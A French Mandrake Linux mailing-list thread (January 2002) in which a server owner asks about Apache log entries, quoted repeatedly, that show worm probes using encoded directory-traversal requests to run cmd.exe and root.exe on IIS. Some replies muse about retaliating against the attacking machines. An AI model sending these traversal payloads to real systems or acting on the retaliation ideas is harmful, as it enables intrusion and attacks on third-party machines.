RE: [Confirme] Attaque d'Apache ?
J'ai eu le meme pb avec exactement les memes logs sur mon apache provenant d'un rigolo de Wanadoo sur Paris. Je pense qu'une bonne plainte serait une bonne chose. Wanadoo a un mail a disposition pour transmettre les pb de ce genre (voir la hot line de Wanadoo pour avoir le mail en question). Christian RAGUET. -Message d'origine- De: Denis Bergeron [mailto:[EMAIL PROTECTED]] Date: lundi 14 janvier 2002 02:18 À: [EMAIL PROTECTED] Objet: Re: [Confirme] Attaque d'Apache ? C'est une attaque, il essaye d'exécuter le programme root.exe cmd .. qui justement donne l'équivalent du accès telnet root sur IIS, mais c'est des vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui a pris des trucs de l'an passée et qui sait pas faire la différence avec apache et IIS... au pire, tu peux (en fait tu devrais) faire un recherche du propriétaire de l'adresse et faire une plainte officielle à son ISP (FAI)... Au Canada, la plupart des founisseurs d'accès à Internet coupe le compte de ce genre de personne après trois plainte.s -Denis Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : Bonsoir, Les logs d'Apache ci-dessous montrent que des tentatives de recherches de fichiers Windows se font sur mon Linux Mandrake 8.1. Les IP sont celles de France-Télécom. Ce serveur n'était pas censé fournir des pages sur Internet mais seulement en intranet. Il était ouvert sur l'extérieur à des fins de tests. Depuis, je l'ai verrouillé et en ai profité pour installer Bastille. Pour mon information personnelle, s'agit-il d'une tentative d'attaque ou d'une requête normale de FT (je doute) ? Merci pour vos lumières. AF 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] GET /scripts/root.exe?/c+dir HTTP/1.0 404 300 - - 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] GET /MSADC/root.exe?/c+dir HTTP/1.0 404 298 - - 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 308 - - 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 308 - - 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 - - 193.253.226.194 - - [11/Jan/2002:21:20:38 +0100] GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ 1.0 404 339 - - 193.253.226.194 - - [11/Jan/2002:21:20:47 +0100] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ 1.0 404 339 - - 193.253.226.194 - - [11/Jan/2002:21:20:58 +0100] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s ystem32/cmd.exe?/c+dir HTTP/1.0 404 355 - - 193.253.226.194 - - [11/Jan/2002:21:21:03 +0100] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:06 +0100] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:10 +0100] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:15 +0100] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:19 +0100] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 305 - - 193.253.226.194 - - [11/Jan/2002:21:21:30 +0100] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 305 - - 193.253.226.194 - - [11/Jan/2002:21:21:36 +0100] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 - - 193.253.226.194 - - [11/Jan/2002:21:21:40 +0100] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 - - Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
Re: [Confirme] Attaque d'Apache ?
pouvez vous me dire quel est le fichier de log de apache ou l'on trouve cela ? Merci ! Alain Le Lundi 14 Janvier 2002 09:49, vous avez ?rit : J'ai eu le meme pb avec exactement les memes logs sur mon apache provenant d'un rigolo de Wanadoo sur Paris. Je pense qu'une bonne plainte serait une bonne chose. Wanadoo a un mail a disposition pour transmettre les pb de ce genre (voir la hot line de Wanadoo pour avoir le mail en question). Christian RAGUET. -Message d'origine- De: Denis Bergeron [mailto:[EMAIL PROTECTED]] Date: lundi 14 janvier 2002 02:18 À: [EMAIL PROTECTED] Objet: Re: [Confirme] Attaque d'Apache ? C'est une attaque, il essaye d'exécuter le programme root.exe cmd .. qui justement donne l'équivalent du accès telnet root sur IIS, mais c'est des vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui a pris des trucs de l'an passée et qui sait pas faire la différence avec apache et IIS... au pire, tu peux (en fait tu devrais) faire un recherche du propriétaire de l'adresse et faire une plainte officielle à son ISP (FAI)... Au Canada, la plupart des founisseurs d'accès à Internet coupe le compte de ce genre de personne après trois plainte.s -Denis Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : Bonsoir, Les logs d'Apache ci-dessous montrent que des tentatives de recherches de fichiers Windows se font sur mon Linux Mandrake 8.1. Les IP sont celles de France-Télécom. Ce serveur n'était pas censé fournir des pages sur Internet mais seulement en intranet. Il était ouvert sur l'extérieur à des fins de tests. Depuis, je l'ai verrouillé et en ai profité pour installer Bastille. Pour mon information personnelle, s'agit-il d'une tentative d'attaque ou d'une requête normale de FT (je doute) ? Merci pour vos lumières. AF 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] GET /scripts/root.exe?/c+dir HTTP/1.0 404 300 - - 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] GET /MSADC/root.exe?/c+dir HTTP/1.0 404 298 - - 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 308 - - 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 308 - - 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 - - 193.253.226.194 - - [11/Jan/2002:21:20:38 +0100] GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ 1.0 404 339 - - 193.253.226.194 - - [11/Jan/2002:21:20:47 +0100] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ 1.0 404 339 - - 193.253.226.194 - - [11/Jan/2002:21:20:58 +0100] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s ystem32/cmd.exe?/c+dir HTTP/1.0 404 355 - - 193.253.226.194 - - [11/Jan/2002:21:21:03 +0100] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:06 +0100] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:10 +0100] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:15 +0100] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:19 +0100] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 305 - - 193.253.226.194 - - [11/Jan/2002:21:21:30 +0100] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 305 - - 193.253.226.194 - - [11/Jan/2002:21:21:36 +0100] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 - - 193.253.226.194 - - [11/Jan/2002:21:21:40 +0100] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 - - Content-Type: text/plain; charset=iso-8859-1; name=message.footer Content-Transfer-Encoding: 8bit Content-Description: -- -- Alain Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
[Confirme] Mutation ext2-3
J'ai compilé un 2.4.17 avec l'option fs.ext3, installé: e2fsprogs-1.24a-2mdk util-linux-2.11h-3mdk mount-2.11h-2mdk Maintenant que dois-je faire, pour passer (en douceur) en ext3 Quelle doc dois-je lire ? Les 3 rpm citées ci-dessus sont particulièrement pauvres en doc sur ext3. Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
Re: [Confirme] Attaque d'Apache ?
Le fichier est dans /var/log/httpd/error.log pour les erreurs et access.log pour le reste. Perso, j'ai tellement d'attaque de ce genre, que je n'y fait même plus attention. J'ai juste des logs relativement gros en comparaison du traffic sur mon serveur. Le Lundi 14 Janvier 2002 09:59, alain siani a écrit : pouvez vous me dire quel est le fichier de log de apache ou l'on trouve cela ? Merci ! Alain Le Lundi 14 Janvier 2002 09:49, vous avez ?rit : J'ai eu le meme pb avec exactement les memes logs sur mon apache provenant d'un rigolo de Wanadoo sur Paris. Je pense qu'une bonne plainte serait une bonne chose. Wanadoo a un mail a disposition pour transmettre les pb de ce genre (voir la hot line de Wanadoo pour avoir le mail en question). Christian RAGUET. -Message d'origine- De: Denis Bergeron [mailto:[EMAIL PROTECTED]] Date: lundi 14 janvier 2002 02:18 À: [EMAIL PROTECTED] Objet: Re: [Confirme] Attaque d'Apache ? C'est une attaque, il essaye d'exécuter le programme root.exe cmd .. qui justement donne l'équivalent du accès telnet root sur IIS, mais c'est des vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui a pris des trucs de l'an passée et qui sait pas faire la différence avec apache et IIS... au pire, tu peux (en fait tu devrais) faire un recherche du propriétaire de l'adresse et faire une plainte officielle à son ISP (FAI)... Au Canada, la plupart des founisseurs d'accès à Internet coupe le compte de ce genre de personne après trois plainte.s -Denis Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : Bonsoir, Les logs d'Apache ci-dessous montrent que des tentatives de recherches de fichiers Windows se font sur mon Linux Mandrake 8.1. Les IP sont celles de France-Télécom. Ce serveur n'était pas censé fournir des pages sur Internet mais seulement en intranet. Il était ouvert sur l'extérieur à des fins de tests. Depuis, je l'ai verrouillé et en ai profité pour installer Bastille. Pour mon information personnelle, s'agit-il d'une tentative d'attaque ou d'une requête normale de FT (je doute) ? Merci pour vos lumières. AF 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] GET /scripts/root.exe?/c+dir HTTP/1.0 404 300 - - 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] GET /MSADC/root.exe?/c+dir HTTP/1.0 404 298 - - 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 308 - - 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 308 - - 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 - - 193.253.226.194 - - [11/Jan/2002:21:20:38 +0100] GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ 1.0 404 339 - - 193.253.226.194 - - [11/Jan/2002:21:20:47 +0100] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ 1.0 404 339 - - 193.253.226.194 - - [11/Jan/2002:21:20:58 +0100] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt /s ystem32/cmd.exe?/c+dir HTTP/1.0 404 355 - - 193.253.226.194 - - [11/Jan/2002:21:21:03 +0100] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:06 +0100] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:10 +0100] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:15 +0100] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:19 +0100] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 305 - - 193.253.226.194 - - [11/Jan/2002:21:21:30 +0100] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 305 - - 193.253.226.194 - - [11/Jan/2002:21:21:36 +0100] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 - - 193.253.226.194 - - [11/Jan/2002:21:21:40 +0100] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 - - Content-Type: text/plain; charset=iso-8859-1; name=message.footer Content-Transfer-Encoding: 8bit Content-Description: -- Bruno Pinaud Ecole Polytechnique de l'université de Nantes (Polytech' Nantes) Institut de recherche en informatique de Nantes (IRIN) Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
Re: [Confirme] Attaque d'Apache ?
c'est un ver je pense genre code red C'est une attaque, il essaye d'exécuter le programme root.exe cmd .. qui justement donne l'équivalent du accès telnet root sur IIS, mais c'est des vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui a pris des trucs de l'an passée et qui sait pas faire la différence avec apache et IIS... au pire, tu peux (en fait tu devrais) faire un recherche du propriétaire de l'adresse et faire une plainte officielle à son ISP (FAI)... Au Canada, la plupart des founisseurs d'accès à Internet coupe le compte de ce genre de personne après trois plainte.s -Denis Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : Bonsoir, Les logs d'Apache ci-dessous montrent que des tentatives de recherches de fichiers Windows se font sur mon Linux Mandrake 8.1. Les IP sont celles de France-Télécom. Ce serveur n'était pas censé fournir des pages sur Internet mais seulement en intranet. Il était ouvert sur l'extérieur à des fins de tests. Depuis, je l'ai verrouillé et en ai profité pour installer Bastille. Pour mon information personnelle, s'agit-il d'une tentative d'attaque ou d'une requête normale de FT (je doute) ? Merci pour vos lumières. AF 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] GET /scripts/root.exe?/c+dir HTTP/1.0 404 300 - - 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] GET /MSADC/root.exe?/c+dir HTTP/1.0 404 298 - - 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 308 - - 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 308 - - 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 - - 193.253.226.194 - - [11/Jan/2002:21:20:38 +0100] GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ 1.0 404 339 - - 193.253.226.194 - - [11/Jan/2002:21:20:47 +0100] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ 1.0 404 339 - - 193.253.226.194 - - [11/Jan/2002:21:20:58 +0100] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s ystem32/cmd.exe?/c+dir HTTP/1.0 404 355 - - 193.253.226.194 - - [11/Jan/2002:21:21:03 +0100] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:06 +0100] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:10 +0100] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:15 +0100] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:19 +0100] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 305 - - 193.253.226.194 - - [11/Jan/2002:21:21:30 +0100] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 305 - - 193.253.226.194 - - [11/Jan/2002:21:21:36 +0100] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 - - 193.253.226.194 - - [11/Jan/2002:21:21:40 +0100] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 - - Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com; -- Paul Le Secq Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
RE: [Confirme] Attaque d'Apache ?
et si on cree betement un fichier qui recherche et qui ferait planter le client, ca pourrait etre bien! Personne n'as d'idee comment le concevoir... -Message d'origine- De : [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]De la part de Bruno Pinaud Envoyé : lundi, 14. janvier 2002 10:23 À : [EMAIL PROTECTED]; [EMAIL PROTECTED] Objet : Re: [Confirme] Attaque d'Apache ? Le fichier est dans /var/log/httpd/error.log pour les erreurs et access.log pour le reste. Perso, j'ai tellement d'attaque de ce genre, que je n'y fait même plus attention. J'ai juste des logs relativement gros en comparaison du traffic sur mon serveur. Le Lundi 14 Janvier 2002 09:59, alain siani a écrit : pouvez vous me dire quel est le fichier de log de apache ou l'on trouve cela ? Merci ! Alain Le Lundi 14 Janvier 2002 09:49, vous avez ?rit : J'ai eu le meme pb avec exactement les memes logs sur mon apache provenant d'un rigolo de Wanadoo sur Paris. Je pense qu'une bonne plainte serait une bonne chose. Wanadoo a un mail a disposition pour transmettre les pb de ce genre (voir la hot line de Wanadoo pour avoir le mail en question). Christian RAGUET. -Message d'origine- De: Denis Bergeron [mailto:[EMAIL PROTECTED]] Date: lundi 14 janvier 2002 02:18 À: [EMAIL PROTECTED] Objet: Re: [Confirme] Attaque d'Apache ? C'est une attaque, il essaye d'exécuter le programme root.exe cmd .. qui justement donne l'équivalent du accès telnet root sur IIS, mais c'est des vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui a pris des trucs de l'an passée et qui sait pas faire la différence avec apache et IIS... au pire, tu peux (en fait tu devrais) faire un recherche du propriétaire de l'adresse et faire une plainte officielle à son ISP (FAI)... Au Canada, la plupart des founisseurs d'accès à Internet coupe le compte de ce genre de personne après trois plainte.s -Denis Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : Bonsoir, Les logs d'Apache ci-dessous montrent que des tentatives de recherches de fichiers Windows se font sur mon Linux Mandrake 8.1. Les IP sont celles de France-Télécom. Ce serveur n'était pas censé fournir des pages sur Internet mais seulement en intranet. Il était ouvert sur l'extérieur à des fins de tests. Depuis, je l'ai verrouillé et en ai profité pour installer Bastille. Pour mon information personnelle, s'agit-il d'une tentative d'attaque ou d'une requête normale de FT (je doute) ? Merci pour vos lumières. AF 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] GET /scripts/root.exe?/c+dir HTTP/1.0 404 300 - - 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] GET /MSADC/root.exe?/c+dir HTTP/1.0 404 298 - - 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 308 - - 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 308 - - 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 - - 193.253.226.194 - - [11/Jan/2002:21:20:38 +0100] GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ 1.0 404 339 - - 193.253.226.194 - - [11/Jan/2002:21:20:47 +0100] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ 1.0 404 339 - - 193.253.226.194 - - [11/Jan/2002:21:20:58 +0100] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt /s ystem32/cmd.exe?/c+dir HTTP/1.0 404 355 - - 193.253.226.194 - - [11/Jan/2002:21:21:03 +0100] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:06 +0100] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:10 +0100] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:15 +0100] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:19 +0100] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 305 - - 193.253.226.194 - - [11/Jan/2002:21:21:30 +0100] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 305 - - 193.253.226.194 - - [11/Jan/2002:21:21:36 +0100] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 - - 193.253.226.194 - - [11/Jan/2002:21:21:40 +0100] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 - - Content-Type: text/plain; charset=iso-8859-1; name=message.footer Content-Transfer-Encoding: 8bit Content-Description: --
Re: [Confirme] Attaque d'Apache ?
J'avais pensé faire un fichier de 500Mo de zéro et le faire pointer vers les cibles des attaques, ça peut être marrant... (mais ma ligne ADSL risque de ne pas trop aimer) ou alors un shell maison Le Lundi 14 Janvier 2002 10:29, Yves huguenin a écrit : et si on cree betement un fichier qui recherche et qui ferait planter le client, ca pourrait etre bien! Personne n'as d'idee comment le concevoir... -Message d'origine- De : [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]De la part de Bruno Pinaud Envoyé : lundi, 14. janvier 2002 10:23 À : [EMAIL PROTECTED]; [EMAIL PROTECTED] Objet : Re: [Confirme] Attaque d'Apache ? Le fichier est dans /var/log/httpd/error.log pour les erreurs et access.log pour le reste. Perso, j'ai tellement d'attaque de ce genre, que je n'y fait même plus attention. J'ai juste des logs relativement gros en comparaison du traffic sur mon serveur. Le Lundi 14 Janvier 2002 09:59, alain siani a écrit : pouvez vous me dire quel est le fichier de log de apache ou l'on trouve cela ? Merci ! Alain Le Lundi 14 Janvier 2002 09:49, vous avez ?rit : J'ai eu le meme pb avec exactement les memes logs sur mon apache provenant d'un rigolo de Wanadoo sur Paris. Je pense qu'une bonne plainte serait une bonne chose. Wanadoo a un mail a disposition pour transmettre les pb de ce genre (voir la hot line de Wanadoo pour avoir le mail en question). Christian RAGUET. -Message d'origine- De: Denis Bergeron [mailto:[EMAIL PROTECTED]] Date: lundi 14 janvier 2002 02:18 À: [EMAIL PROTECTED] Objet: Re: [Confirme] Attaque d'Apache ? C'est une attaque, il essaye d'exécuter le programme root.exe cmd .. qui justement donne l'équivalent du accès telnet root sur IIS, mais c'est des vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui a pris des trucs de l'an passée et qui sait pas faire la différence avec apache et IIS... au pire, tu peux (en fait tu devrais) faire un recherche du propriétaire de l'adresse et faire une plainte officielle à son ISP (FAI)... Au Canada, la plupart des founisseurs d'accès à Internet coupe le compte de ce genre de personne après trois plainte.s -Denis Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : Bonsoir, Les logs d'Apache ci-dessous montrent que des tentatives de recherches de fichiers Windows se font sur mon Linux Mandrake 8.1. Les IP sont celles de France-Télécom. Ce serveur n'était pas censé fournir des pages sur Internet mais seulement en intranet. Il était ouvert sur l'extérieur à des fins de tests. Depuis, je l'ai verrouillé et en ai profité pour installer Bastille. Pour mon information personnelle, s'agit-il d'une tentative d'attaque ou d'une requête normale de FT (je doute) ? Merci pour vos lumières. AF 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] GET /scripts/root.exe?/c+dir HTTP/1.0 404 300 - - 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] GET /MSADC/root.exe?/c+dir HTTP/1.0 404 298 - - 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 308 - - 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 308 - - 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 - - 193.253.226.194 - - [11/Jan/2002:21:20:38 +0100] GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ 1.0 404 339 - - 193.253.226.194 - - [11/Jan/2002:21:20:47 +0100] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ 1.0 404 339 - - 193.253.226.194 - - [11/Jan/2002:21:20:58 +0100] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt /s ystem32/cmd.exe?/c+dir HTTP/1.0 404 355 - - 193.253.226.194 - - [11/Jan/2002:21:21:03 +0100] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:06 +0100] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:10 +0100] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:15 +0100] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:19 +0100] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 305 - - 193.253.226.194 - - [11/Jan/2002:21:21:30 +0100] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 305 - - 193.253.226.194 - - [11/Jan/2002:21:21:36 +0100] GET
Re: [Confirme] Attaque d'Apache ?
Le Lundi 14 Janvier 2002 11:04, Bruno Pinaud a posté : J'avais pensé faire un fichier de 500Mo de zéro et le faire pointer vers les cibles des attaques, ça peut être marrant... (mais ma ligne ADSL risque de ne pas trop aimer) ou alors un shell maison Le Lundi 14 Janvier 2002 10:29, Yves huguenin a écrit : et si on cree betement un fichier qui recherche et qui ferait planter le client, ca pourrait etre bien! Personne n'as d'idee comment le concevoir... Tout ceci ne serait pas bien malin et ne ferait que surcharger encore le réseau Internet... Les attaques mentionnées dans ce thread sont faites par des machines comportant un serveur IIS contaminé et ceci à l'insu de leur propriétaire. Le plus malin serait - si c'est possible - de prévenir le propriétaire de la machine contaminé ou - si ce n'est pas possible - de ne rien faire du tout... -- MP Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
Re: [Confirme] Attaque d'Apache ?
Je suis entièrement d'accord avec Michel. Soit dit en passans, j'avais eu une discussion, cet été, au plus fort de la virulence de Nimba, avec la hot line de wanadoo. Je me suis entendu répondre que ces derniers ne souhaitait même pas prévenir les personnes susceptible d'héberger un serveur infecté. No comment. Vincent Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
Re: [Confirme] Attaque d'Apache ?
Tu connais l'ip spoofing ? En gros A envoi une requète à B en disant que c'est C qui l'envoi. C, s'il existe, va être content de se faire planter sa machine. Le Lundi 14 Janvier 2002 10:29, vous avez écrit : et si on cree betement un fichier qui recherche et qui ferait planter le client, ca pourrait etre bien! Personne n'as d'idee comment le concevoir... -Message d'origine- De : [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]De la part de Bruno Pinaud Envoyé : lundi, 14. janvier 2002 10:23 À : [EMAIL PROTECTED]; [EMAIL PROTECTED] Objet : Re: [Confirme] Attaque d'Apache ? Le fichier est dans /var/log/httpd/error.log pour les erreurs et access.log pour le reste. Perso, j'ai tellement d'attaque de ce genre, que je n'y fait même plus attention. J'ai juste des logs relativement gros en comparaison du traffic sur mon serveur. Le Lundi 14 Janvier 2002 09:59, alain siani a écrit : pouvez vous me dire quel est le fichier de log de apache ou l'on trouve cela ? Merci ! Alain Le Lundi 14 Janvier 2002 09:49, vous avez ?rit : J'ai eu le meme pb avec exactement les memes logs sur mon apache provenant d'un rigolo de Wanadoo sur Paris. Je pense qu'une bonne plainte serait une bonne chose. Wanadoo a un mail a disposition pour transmettre les pb de ce genre (voir la hot line de Wanadoo pour avoir le mail en question). Christian RAGUET. -Message d'origine- De: Denis Bergeron [mailto:[EMAIL PROTECTED]] Date: lundi 14 janvier 2002 02:18 À: [EMAIL 